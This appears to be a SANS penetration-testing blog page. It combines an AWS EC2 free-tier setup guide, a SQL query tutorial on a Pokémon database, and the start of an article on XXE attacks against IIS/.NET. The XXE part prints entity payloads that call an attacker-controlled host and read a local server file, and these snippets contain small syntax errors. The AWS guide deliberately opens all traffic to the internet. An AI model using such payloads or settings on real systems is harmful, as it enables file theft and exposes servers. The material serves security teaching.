Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SANS Poster: Building a Better Pen Tester – PDF Download

 

Blog Post by: SANS Pen Test Team

 

It’s here! It’s here! The NEW SANS Penetration Testing Curriculum Poster has arrived (in PDF format)!

This blog post is for the downloadable PDF version of the new “Blueprint: Building a Better Pen Tester” Poster created by the SANS Pen Test Curriculum.

The front of the poster is full of useful information directly from the brains of SANS Pen Test Instructors. These are the pen testing tips they share with the students of SANS SEC560: Network Penetration Testing and Ethical Hacking and our other pen testing, ethical hacking, exploit dev, and vulnerability assessment courses.

The back of the poster has a checklist for scoping and rules of engagement, command line commands for Metasploit, Scapy, Nmap, and PowerShell, and information about Slingshot and the SANS Pen Test Curriculum.

Our hope is, the knowledge contained in this poster will help you become a better pen tester. And if you aren’t currently a pen tester, that the information will you help you become a more informed information security professional.

Training: Learn ethical hacking and penetration testing with one of our world-class instructors by taking, SEC560: Network Penetration Testing and Ethical Hacking in person or online.

Download:

PENT-PSTR-SANS18-BP-V1-01

PENT-PSTR-SANS18-BP-V1-02

Download: PENT-PSTR-SANS18-BP-V1_web

 

SANS Webcast – Building A Better Pen Tester Poster

EdSkoudis_PenTestPoster_Blueprint_02_01092018

YouTube: https://youtu.be/feljUh5Q6V0

Desktop Wallpapers:

Click image for full-sized wallpaper file

Blueprint_Wallpaper_Pre-Eng&ReconPre-Engagement & Reconnaissance

 

Blueprint_Wallpaper_VA&PAVulnerability Analysis & Password Attacks

 

Blueprint_Wallpaper_Exp&Post-ExpExploitation & Post-Exploitation

 

Blueprint_Wallpaper_RE&ScopingRules of Engagement & Scoping Checklist

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Putting My Zero Cents In: Using the Free Tier on Amazon Web Services (EC2)

By Jeff McJunkin
Counter Hack

Hello, dear readers! Many times when penetration testing, playing CTF’s, or experimenting with new tools, I find myself needing ready access to a Linux installation of my choosing, a public IPv4 address, and…well, not a lot else really. I like Virtual Private Servers (VPSs) for this purpose – essentially a VM hosted by somebody else, so I don’t have to walk through Yet Another Linux Installation.

There are a number of VPS providers. I use Amazon Web Services, DigitalOcean, and Linode pretty frequently. Today, I’ll talk about getting started with Amazon Web Services, as they have a really nice deal to get your Linux (and Windows!) VPS fix for free*.

* Well, free for the first year, anyway. About $8.75 per month thereafter for Linux (~$12 for Windows), depending on bandwidth utilization and such.

To read more about Amazon’s offer, you can browse here. Some services are only free for the first year of a new account (like the EC2 instances I’ll be talking about today), whereas others are free forever (with usage limitations).

free_tier_offer

Okay, how does one go about setting up a new Amazon account? I admit my primary account was made before a free tier existed, so sadly my personal account doesn’t get access to those services. So I’ll walk through the setup on my Counter Hack email, instead. Shall we play a game?

Signing up for Amazon Web Services

First, browse to Amazon Web Services and click Sign Up in the upper-right corner.

You’ll see a page like the following. Fill out the requested information.
sign_up

After you click Continue, Amazon will send you a confirmation email. You don’t have to click on anything in the email. Amazon will ask for more information, as shown in the following screenshot:

contact_info

Note: I am not Jenny. Please don’t call her.

I also had to do a phone verification and CAPTCHA, assumedly to make sure people aren’t signing up for thousands of free tier accounts. For some reason I’m sure I can’t understand, Amazon isn’t using Google’s reCAPTCHA service (though to be honest, I’m tired of filling out reCAPTCHA’s for new accounts on Twitter).

phone_verificationphone_verification_complete

Note: I am still not Jenny. But her number does work is registered on a surprising number of in-store reward programs…

 

After filling out that last bit of info, you should arrive at a management screen that looks much like the following:

login_upperleft

Note that you’re automatically dropped into one of Amazon’s many sites. In my case, this management console is for us-east-2. You can see the other sites available in the upper right of the same page:

login_upperright

(Pro-tip: When doing penetration tests in a foreign country, talk to your lawyer, but consider setting up a server in the same foreign country. It can make dealing with international computer crimes laws considerably easier, since your scanning and C2 traffic will originate and terminate in the same country. I Am Not A Lawyer, this is not legal advice, etc.)

In my case, I’ll set up a new EC2 instance (or “server”, essentially, but you’ll probably hear the EC2 terminology) in us-east-2, so I don’t have to choose a new region. You may want to choose a region physically closer to you – for example, I live in Oregon, and there is an Oregon datacenter that should have lower latency.

To set up my new and free (for a year) server, I’ll click on Services, then on EC2 under the Compute section. There are certainly a lot of other Amazon Web Services available, but today we’ll limit ourselves to EC2.

services_ec2

Here we are at the EC2 Management Console. There are lots of options available, but let’s start by making our free Linux instance. Click on Launch Instance.

ec2_management_consoleEC2 Management Console

There are seven steps to creating an instance, though the process can be streamlined and automated. In Step 1 (shown below), scroll down and find Ubuntu Server 16.04 LTS (HVM), SSD Volume Type – ami-82f4dae7, then click Select.

ec2_step1

Make sure t2.micro is selected (it was select for me by default), then click Next: Configure Instance Details. After you get your security groups and SSH keys set up, you can use Review and Launch, but let’s go one step at a time to make things easier.
ec2_step2

We don’t need to specify any of the options in Step 3 (we’re not launching multiple instances simultaneously, setting up more advanced network settings, etc.) so go ahead and click Next: Add Storage.
ec2_step3

Next we’re at the storage section. t2.micro instances only use Amazon’s Elastic Block Storage service or EBS for short. EBS is free for up to 30 gigabytes for the first year of utilization, so you’re safe to increase the default 8 gigabytes to 15 gigabytes under Size (GiB) for the Root volume:
ec2_step4
ebs_free_tier

Hopefully gigabytes vs gibibytes doesn’t result in a few pennies a month in charges. Make it a baker’s dozen of gigabytes if you want to play it safe.

Next, on step 5, we have the option of adding tags, which are convenient for automation and for keeping track of which instances are doing which tasks. For our tasks, though, we can just click Next: Configure Security Group to move to the next step.
ec2_step5

Next up is step 6, where we configure the security group for our new instance. By default, Amazon only allows SSH traffic, controlled by a default security policy. If you open up a netcat listener on port 8000 you won’t be able to reach that port from across the internet (even if you configure iptables locally to permit that access).
ec2_step6

For the purpose of easily using our public IPv4 address with any TCP or UDP port I’ve configured Amazon to allow all traffic to this new instance. First, click on Type and select All traffic, then set the Source to Custom with 0.0.0.0/0 as the source range. In CIDR notation, /0 means the entire IPv4 internet. I named the security group appropriately as lolsecurity, because I am essentially disabling the Amazon network firewall. Click Review and Launch to move on once you’re done.
ec2_step6_continued

Step 7 lets us review the settings we’ve done in the prior steps before launching our new instance. You may want to double-check your work here, but click Launch when you’re ready.

EC2 Instance Creation - Step 7ec2_step7

Surprise! We’re not quite done. Amazon doesn’t normally allow password-based authentication to Linux instances (a practice I agree with), so we need to configure SSH key-based authentication.

ec2_keypairs

In the first dropdown, select Create a new key pair, then choose a name. I wasn’t terribly creative, and I went with ec2 as the keypair name.
ec2_keypairs_2

Click Download Key Pair, then click the plurality-challenged Launch Instances button. Woohoo!
ec2_keypairs_3

Now we have a keypair and the resulting screen shows that our new instance has launched. Click on the instance name (i-02eb1e17779d19ee2 in my case) to get more details on that instance.
ec2_instance_launched

Here we see more information about this instance in particular. Note the built-in DNS name under Public DNS: ec2-18-217-213-237.us-east-2.compute.amazonaws.com in my case.
ec2_instance_running

Ubuntu discourages direct use of the root account, so the actual account name that is automatically created is called ubuntu (case sensitive). If you’re coming from a macOS, Linux machine, or Windows 10 with bash installed, you can use the downloaded SSH key (ec2.pem in my case) and log in as follows, accepting the SSH host key by pressing y and Enter when asked:

jeff@blue:~/Downloads$ ssh -i ec2.pem ec2-user@ec2-18-217-213-237.us-east-2.compute.amazonaws.com
The authenticity of host 'ec2-18-217-213-237.us-east-2.compute.amazonaws.com (18.217.213.237)' can't be established.
ECDSA key fingerprint is SHA256:9SChnVhpbky3+Jg06Dtzw6F2Vp+cUGDwf9F1q9A/+9A.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'ec2-18-217-213-237.us-east-2.compute.amazonaws.com,18.217.213.237' (ECDSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0664 for 'ec2.pem' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "ec2.pem": bad permissions
Permission denied (publickey).

I, uh, totally meant to demonstrate that issue. By default, your freshly-downloaded SSH private key will have permissions that are excessive. The ssh client wants to discourage other people from being able to read your private key, so it doesn’t allow use of insecure private keys. If we’re in the same directory as the SSH key, we can fix the permissions on macOS or Linux by running the following command:

jeff@blue:~/Downloads$ chmod 600 ec2.pem

Now, let’s give ssh-ing in another shot, shall we?

jeff@blue:~/Downloads$ ssh -i ec2.pem ubuntu@ec2-18-217-213-237.us-east-2.compute.amazonaws.com
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-1041-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

0 packages can be updated.
0 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@ip-172-31-29-177:~$ 

Ah, now that’s much better. Run sudo -i to switch to running as the root user, as necessary.

Using Windows and PuTTY to Connect to Your Amazon Instance

If you’re using Windows (and not bash on Windows 10), you will need to set up an SSH client such as PuTTY. PuTTY uses a different format for the SSH key, so you’ll need to convert the PEM-format download you got from Amazon. Download and install PuTTY from their installation page if you haven’t already installed it.

Next, start up PuTTYgen to convert that SSH key.

PuTTYgen_1

Click on Load, to the right of Load an existing private key. Browse to the folder where you downloaded the Amazon EC2 private key, click the drop-down labeled **PuTTY Private Key Files (*.ppk) and choose All Files (*.*)**, then select the downloaded EC2 private key.
PuTTYgen_2

PuTTYgen will let you know it has successfully imported the private key. Next we’ll need to save it in PuTTY’s own format. Click OK.
PuTTYgen_3

Next, click on Save private key on the main PuTTYgen window.
PuTTYgen_4

SSH keys can be encrypted with a password, but I’ll skip setting one in this case. “It’s not for production” is a great excuse, isn’t it? I use that one rather often.
PuTTYgen_5

Choose a download location and file name, then click Save.
PuTTYgen_6

Okay, we’re done with PuTTYgen. Close PuTTYgen and open PuTTY.
PuTTY_1

Type ubuntu@ and the Public DNS name we got from Amazon earlier into the Host Name (or IP address) window.
PuTTY_2

Next, click the plus icon on Connection in the left menu pane, then SSH, then Auth. Click Browse to find the private SSH key we exported just now from PuTTYgen.
PuTTY_3

Select your PuTTYgen-generated private key and click Open.
PuTTY_4

Next, go back to the Session area of PuTTY. I highly recommend saving these session settings by typing a name under Saved Sessions. I chose another uninteresting name of ec2-freetier. Click Save after you’ve pondered and typed an appropriate name.
PuTTY_5

Click Open to connect to your new Amazon instance once you’ve saved the session. You’ll get an SSH host key warning, since this is the first time you’ve connected to this new IP/hostname:port:SSH server combination.
PuTTY_6

Finally, you’re in that remote SSH session using PuTTY! The conversion process is only a one-time pain, so using PuTTY can be pretty convenient.
PuTTY_7

Conclusion

Using public cloud resources doesn’t have to be a pain, but there’s some setup work that isn’t entirely intuitive. Using these directions you can get a free t2.micro Linux server for a full year. You can actually also run a t2.micro Windows instance online for a year for free, too!

I hope this helps! Enjoy your holiday hacking season, and I hope you enthusiastically partake of any challenges that life (or Counter Hack and SANS) sends your way. :)

Until next time…

– Jeff McJunkin

@jeffmcjunkin

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Your Pokemon Guide for Essential SQL Pen Test Commands

By Joshua Wright
Counter Hack

As a pen tester, it’s not enough to exploit targets and get shells. That’s great (and it’s a big part of what we do), but the real value to the customer is to demonstrate what the effective risk is from the successful exploitation of a vulnerability. In order to answer this question, I find myself interrogating data on compromised systems, trying to make sense of what’s available and what the disclosure of the data will mean to my customer.

Often, I find myself looking at a bunch of data in a SQL database. This might be a native SQL database (usually MSSQL, SQLite3, MySQL, Oracle, etc.), but sometimes it’s a database I’ve created by importing CSV files, JSON data, or other data formats. As a former DBA (a long, long time ago) I feel really comfortable at a SQL> prompt. In this article I’ll offer some quick tips on getting useful data out of a database.

I’m going to use a Pokémon Pokedex SQLite3 database as my data source for examples. This database is the labor-of-love project from Eevee. Special thanks to Eevee for making this complex database available.

Data Structures

Identify the structure of tables, indexes, and other objects using the .schema command:

sqlite> .schema
CREATE TABLE item_pockets (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
PRIMARY KEY (id)
);
CREATE TABLE pokeathlon_stats (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
PRIMARY KEY (id)
);
...

This database has several tables. If you want to look at the structure of a single table, specify a table:

sqlite> .schema pokemon
CREATE TABLE pokemon (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
species_id INTEGER,
height INTEGER NOT NULL,
weight INTEGER NOT NULL,
base_experience INTEGER NOT NULL,
"order" INTEGER NOT NULL,
is_default BOOLEAN NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(species_id) REFERENCES pokemon_species (id),
CHECK (is_default IN (0, 1))
);
CREATE INDEX ix_pokemon_order ON pokemon ("order");
CREATE INDEX ix_pokemon_is_default ON pokemon (is_default);

Note that the .schema command is very SQLite-specific. Other databses use SHOW TABLES and DESC tablename instead. Most of the other commands shown in this article are generic enough to work across any database.

Retrieving Some or All

We retrieve data from the database using the SQL SELECT statement (I’ve also issued the SQLite3 .headers command to turn on column labels:

sqlite> select * from pokemon;
id|identifier|species_id|height|weight|base_experience|order|is_default
1|bulbasaur|1|7|69|64|1|1
2|ivysaur|2|10|130|142|2|1
3|venusaur|3|20|1000|236|3|1
4|charmander|4|6|85|62|5|1
5|charmeleon|5|11|190|142|6|1
6|charizard|6|17|905|240|7|1
7|squirtle|7|5|90|63|10|1
8|wartortle|8|10|225|142|11|1
9|blastoise|9|16|855|239|12|1
10|caterpie|10|3|29|39|14|1
...

By specifying the *, we note that we want to retrieve all of the columns. If you only want a few specific columns, specify the columns you want by name in the order you want them to appear:

sqlite> select id, identifier, weight, height from pokemon;
id|identifier|weight|height
1|bulbasaur|69|7
2|ivysaur|130|10
3|venusaur|1000|20
4|charmander|85|6
5|charmeleon|190|11
6|charizard|905|17
7|squirtle|90|5
8|wartortle|225|10
9|blastoise|855|16
10|caterpie|29|3
...

The pokemon table has a lot of records in it. If you only want the first 5 records, add LIMIT 5 to the end of your query:

sqlite> select id, identifier, weight, height, "order" from pokemon limit 5;
id|identifier|weight|height|order
1|bulbasaur|69|7|1
2|ivysaur|130|10|2
3|venusaur|1000|20|3
4|charmander|85|6|5
5|charmeleon|190|11|6

Unique Data

Individual rows of data will often have duplicate values present. We can get a unique list of the values present by using the DISTINCT modifier in a query. For example, consider the structure of the Pokedex contest_type_names table:

sqlite> .schema contest_type_names
CREATE TABLE contest_type_names (
contest_type_id INTEGER NOT NULL,
local_language_id INTEGER NOT NULL,
name VARCHAR(79),
flavor TEXT,
color TEXT,
PRIMARY KEY (contest_type_id, local_language_id),
FOREIGN KEY(contest_type_id) REFERENCES contest_types (id),
FOREIGN KEY(local_language_id) REFERENCES languages (id)
);
CREATE INDEX ix_contest_type_names_name ON contest_type_names (name);
sqlite> select * from contest_type_names;
contest_type_id|local_language_id|name|flavor|color
1|5|Sang-froid|Épicé|Rouge
1|9|Cool|Spicy|Red
2|5|Beauté|Sec|Bleu
2|9|Beauty|Dry|Blue
3|5|Grâce|Sucré|Rose
3|9|Cute|Sweet|Pink
4|5|Intelligence|Amère|Vert
4|9|Smart|Bitter|Green
5|5|Robustesse|Acide|Jaune
5|9|Tough|Sour|Yellow
1|10||Ostrá|
5|10|Síla||
2|10|Krása|Suchá|

The return data set is fairly small, but we can focus it further. What if we are only interested in the unique color assignments given to Pokémon contest types?

sqlite> select distinct(color) from contest_type_names;
Rouge
Red
Bleu
Blue
Rose
Pink
Vert
Green
Jaune
Yellow

Conditional Expressions

Often you’ll want to filter the returned data with a conditional expression, denoted with a WHERE clause. Using a WHERE clause allows you to specify the nature of the data you want returned, matching one or more columns to values you specify. For example, what if we only want to see information about Pikachu in the pokemon table?

sqlite> .schema pokemon
CREATE TABLE pokemon (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
species_id INTEGER,
height INTEGER NOT NULL,
weight INTEGER NOT NULL,
base_experience INTEGER NOT NULL,
"order" INTEGER NOT NULL,
is_default BOOLEAN NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(species_id) REFERENCES pokemon_species (id),
CHECK (is_default IN (0, 1))
);
CREATE INDEX ix_pokemon_order ON pokemon ("order");
CREATE INDEX ix_pokemon_is_default ON pokemon (is_default);
sqlite> select * from pokemon where identifier = "pikachu";
id|identifier|species_id|height|weight|base_experience|order|is_default
25|pikachu|25|4|60|112|32|1

In addition to using matching expressions, SQLite3 also supports common comparison operators, shown here:

Operator Meaning
= Equal to
!= Not equal to
< Less than
> Greater than
<= Less than or equal to
>= Greater than or equal to

 

Let’s use this to find out if there are any Pokémon smaller than Pikachu (who appears to be 4 decimeters from the previous query):
sqlite> select identifier from pokemon where height < 4;
caterpie
weedle
pidgey
rattata
spearow
paras
...

We can combine multiple WHERE expressions together too. For example, what Pokémon are taller than Pikachu but weigh less? (Note that here I’ve pressed Enter to start a new line, prompting SQLite3 to produce a continuation prompt of ...>.)

sqlite> select identifier, height, weight from pokemon
...> where height < 4 and weight > 190;
klink|3|210
durant|3|330

Wildcards

SQL allows you to specify wildcards in your WHERE clauses, using the keyword LIKE and _ to match any single character, or LIKE and % to match a group of characters. Using the pokemon_species_name table, let’s identify all the genus values that match Dr at the beginning of the line:

sqlite> .schema pokemon_species_names
CREATE TABLE pokemon_species_names (
pokemon_species_id INTEGER NOT NULL,
local_language_id INTEGER NOT NULL,
name VARCHAR(79),
genus TEXT,
PRIMARY KEY (pokemon_species_id, local_language_id),
FOREIGN KEY(pokemon_species_id) REFERENCES pokemon_species (id),
FOREIGN KEY(local_language_id) REFERENCES languages (id)
);
CREATE INDEX ix_pokemon_species_names_name ON pokemon_species_names (name);
sqlite> select name, genus from pokemon_species_names where genus like 'Dr%';
name|genus
Nidoqueen|Drill
Nidoking|Drill
Rhydon|Drill
Hypotrempe|Dragon
Seeper|Drache
Horsea|Dragón
Horsea|Drago
Horsea|Dragon
...
Simipour|Drenaje
Munna|Dream Eater
Musharna|Drowsing
Muplodocus|Dragon
Viscogon|Drache
Goodra|Dragón
...

Notice that some of the genus types are Dragon and Dragón. If we want to match either of those two, we can use the _ modifier to match the o and ó characters:

sqlite> select name, genus from pokemon_species_names where genus like 'Drag_n';
name|genus
Hypotrempe|Dragon
Horsea|Dragón
Horsea|Dragon
Hypocéan|Dragon
Seadra|Dragón
Seadra|Dragon
Minidraco|Dragon
Dratini|Dragón
Dratini|Dragon
Draco|Dragon
...

You can also search for the middle portion of a matching string by adding % to the beginning and the end of the expression. For example, we can search for any genus with the word eat:

sqlite> select name, genus from pokemon_species_names
...> where genus like '%eat%';
name|genus
Castform|Weather
Munchlax|Big Eater
Munna|Dream Eater
Heatmor|Anteater

Although it doesn’t show in this output, %eat% will match values starting or ending with eat as well (e.g. there doesn’t have to be preceding or following characters to be a match).

Ordering Data

Sometimes you want to change the order of the data being returned. No problem, simply enter ORDER BY followed by the column you want to use. You can add multiple comma-separated columns in the ORDER BY clause as well. By default, values are listed in ascending order, but this can be modified by adding the keyword DESCENDING to the end of the ORDER BY expression.

For example, the abilities table in the Pokémon database discloses the identifier information, sorted by default using the id field. If you want to change the sort order to the generation_id column, add an ORDER BY clause:

sqlite> .schema abilities
CREATE TABLE abilities (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
generation_id INTEGER NOT NULL,
is_main_series BOOLEAN NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(generation_id) REFERENCES generations (id),
CHECK (is_main_series IN (0, 1))
);
CREATE INDEX ix_abilities_is_main_series ON abilities (is_main_series);
sqlite> select * from abilities order by generation_id;
id|identifier|generation_id|is_main_series
1|stench|3|1
2|drizzle|3|1
3|speed-boost|3|1
4|battle-armor|3|1
5|sturdy|3|1
6|damp|3|1
7|limber|3|1
...
162|victory-star|5|1
163|turboblaze|5|1
164|teravolt|5|1
10001|mountaineer|5|0
10002|wave-rider|5|0
10003|skater|5|0
10004|thrust|5|0
10005|perception|5|0
...
189|primordial-sea|6|1
190|desolate-land|6|1
191|delta-stream|6|1

Cross-table Queries

When people start out designing databases, people try and stuff everything into a single table, even if it’s not efficient or performance-wise to do so. Later, data that changes less frequently, or should be isolated from related records gets placed into a different table, sharing an identifier that allows us to query both tables to produce one set of results.

For example, consider the pokemon_species and pokemon_species_names tables shown below in SQL and visualized forms (courtesy of WWW SQL Designer.

sqlite> .schema pokemon_species
CREATE TABLE pokemon_species (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
generation_id INTEGER,
evolves_from_species_id INTEGER,
evolution_chain_id INTEGER,
color_id INTEGER NOT NULL,
shape_id INTEGER NOT NULL,
habitat_id INTEGER,
gender_rate INTEGER NOT NULL,
capture_rate INTEGER NOT NULL,
base_happiness INTEGER NOT NULL,
is_baby BOOLEAN NOT NULL,
hatch_counter INTEGER NOT NULL,
has_gender_differences BOOLEAN NOT NULL,
growth_rate_id INTEGER NOT NULL,
forms_switchable BOOLEAN NOT NULL,
"order" INTEGER NOT NULL,
conquest_order INTEGER,
PRIMARY KEY (id),
FOREIGN KEY(generation_id) REFERENCES generations (id),
FOREIGN KEY(evolves_from_species_id) REFERENCES pokemon_species (id),
FOREIGN KEY(evolution_chain_id) REFERENCES evolution_chains (id),
FOREIGN KEY(color_id) REFERENCES pokemon_colors (id),
FOREIGN KEY(shape_id) REFERENCES pokemon_shapes (id),
FOREIGN KEY(habitat_id) REFERENCES pokemon_habitats (id),
CHECK (is_baby IN (0, 1)),
CHECK (has_gender_differences IN (0, 1)),
FOREIGN KEY(growth_rate_id) REFERENCES growth_rates (id),
CHECK (forms_switchable IN (0, 1))
);
CREATE INDEX ix_pokemon_species_order ON pokemon_species ("order");
CREATE INDEX ix_pokemon_species_conquest_order ON pokemon_species (conquest_order);
sqlite> .schema pokemon_species_names
CREATE TABLE pokemon_species_names (
pokemon_species_id INTEGER NOT NULL,
local_language_id INTEGER NOT NULL,
name VARCHAR(79),
genus TEXT,
PRIMARY KEY (pokemon_species_id, local_language_id),
FOREIGN KEY(pokemon_species_id) REFERENCES pokemon_species (id),
FOREIGN KEY(local_language_id) REFERENCES languages (id)
);

sqlcommands1

In these two tables, the data for name and genus is in a different table than the primary Pokémon species information. The pokemon_species_names data probably changes less often then the data in pokemon_species, and is a pretty reasonable design. However, how do we formulate a query across the two tables that returns the Pokémon identifier and genus in the same query?

The answer is in the SQL join capability. Take a look:

sqlite> select identifier, genus from pokemon_species, pokemon_species_names where
...> pokemon_species.id = pokemon_species_names.pokemon_species_id and
...> local_language_id = 9;
bulbasaur|Seed
ivysaur|Seed
venusaur|Seed
charmander|Lizard
charmeleon|Flame
charizard|Flame
squirtle|Tiny Turtle
wartortle|Turtle
blastoise|Shellfish
caterpie|Worm
...

Here I’ve selected columns from two tables. The WHERE clause tells SQL to associate records from pokemon_species with records from pokemon_species_id when the id and species_id columns match. I’ve also limited the output where local_language_id is 9, which is English.

In this example, identifier and genus are both unique names in the two different tables. If the column names match across two tables, you can use dot-notation to specify the full table name followed by the column name (e.g. pokemon_species.identifier, pokemon_species_id.genus).

Grouping Data

One powerful SQL statement we haven’t yet covered is the GROUP BY operator. Using GROUP BY, we can order the return results into groups. For example, adding GROUP BY genus to the previous query will order the results by the genus column:

sqlite> select identifier, genus from pokemon_species, pokemon_species_names
...> where pokemon_species.id = pokemon_species_names.pokemon_species_id and
...> local_language_id = 9 GROUP BY genus;
landorus|Abundance
seedot|Acorn
arceus|Alpha
chinchou|Angler
trapinch|Ant Pit
heatmor|Anteater
dedenne|Antenna
marill|Aqua Mouse
azumarill|Aqua Rabbit
hariyama|Arm Thrust

You may be thinking “this doesn’t really seem that useful…couldn’t we get the same result with ORDER BY instead?” You’d be correct, except that GROUP BY is often used with aggregate functions, one of the most powerful tools in your SQL arsenal.

Aggregate Functions

Aggregate functions are a kind of virtual column, allowing you to calculate simple operations on data in tables. Use an aggregate function to calculate a value using one of the following functions:

Function Meaning
COUNT Count the total records
MAX Identify the largest value
MIN Identify the smallest value
SUM Add the values together
AVG Calculate an average value

An aggregate function that I use all the time is COUNT. Want to know how many Pokémon fall into the genus of mouse?

sqlite> select count(genus) from pokemon_species_names
...> where genus = "Mouse" and local_language_id = 9;
6

OK, it was 6. That seems a little anti-climactic.

In this example, count(genus) is used to count the result set that matches the SELECT statement with the return clause. This is often used to simply count the total number of records in a table:

sqlite> .headers on
sqlite> select count(*) as "Total" from pokemon_species_names;
Total
6094

Here I also took the opportunity to demonstrate how we name an aggregate function column. Using the syntax AS "Total" after the aggregate function allows me to reference the aggregate column by name.

Aggregate functions become very useful when you combine them with the GROUP BY operator. Previously we looked for the number of Pokémon in the mouse genus, but what if we want to get a count of how many Pokémon belong to each of the genera? (NB: I had to Google “plural of genus” for that.)

sqlite> select count(name) count, genus from pokemon_species_names
...> where local_language_id = 9 group by genus order by count desc;
count|genus
8|Dragon
6|Mouse
6|Mushroom
5|Balloon
5|Flame
5|Fox
4|Bagworm
4|Bat
4|Cocoon
4|Drill
4|Fairy
4|Poison Pin
4|Seed
4|Tadpole
3|Big Jaw
3|Bivalve
3|Cottonweed
3|EleFish
3|Electric
3|Flower

The GROUP BY operator here groups each of the return results into a set by the specified genus column. By naming the aggregate function column “count”, I was able to reference it later in the ORDER BY clause as well.

Understanding GROUP BY, and aggregate functions is what gives you powerful tools for analyzing SQL data. Use it to identify the number of credit cards disclosed in a compromise, or credit card breach counts grouped by state that have mandatory breach reporting requirements, for example.

Whew! That was a lot of SQL for one article. Master these techniques though, and you’ll be well on your way to getting useful and meaningful data out of SQL databases in your pen-test post-compromise phase. For more interesting SQL lessons specifically using the Pokémon Pokedex database, check out Dandelion Mané’s PokemonSQLTutorial project too!

-Josh Wright
@joswr1ght

SANS Note:

Would you like (4) printed copies of the new SANS Penetration Testing Curriculum poster mailed directly to you?

poster_for_webcast

Then register for the upcoming webcast detailing the new poster, by Ed Skoudis, on January 9th at 1pm EST, and we will mail the printed posters to you after the webcast has aired.

This is for the brand new “Blueprint: Building a Better Pen Tester” poster.

Register now for this free educational webcast and to receive (4) printed copies of the new SANS Pen Test Poster!

Exploiting XXE Vulnerabilities in IIS/.NET

By Chris Davis

XXE (XML External Entity) attacks happen when an XML parser improperly processes input from a user that contains an external entity declaration in the doctype of an XML payload. This external entity may contain further code which allows an attacker to read sensitive data on the system or potentially perform other more severe actions.

This article will demonstrate the steps necessary to perform an XXE attack against IIS servers using the Microsoft .NET framework. However, this article will not go into great depth in explaining how these technologies fundamentally work. Please reference the useful links sections below if you would like to know more about these technologies.

XXE Exploitation

Below we can see an example of an external parameter entity named extentity being declared which uses the SYSTEM directive to load the contents of a URI. Then, %extentity; is called in order to trigger a HTTP GET request to the designated URI below.

<?xml version="1.0" encoding="utf-8"?-->
<!DOCTYPE demo [
     <!ELEMENT demo ANY >
     <!ENTITY % extentity SYSTEM "http://192.168.1.10:4444/evil">
     %extentity;
     ]
>

Alternatively, this same directive could be used to access a file locally on a system:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
     [<!ELEMENT demo ANY >
     <!ENTITY % extentity SYSTEM "file:///c:/inetpub/wwwroot/Views/secret_source.cshtml">
     %extentity;
     ]
>

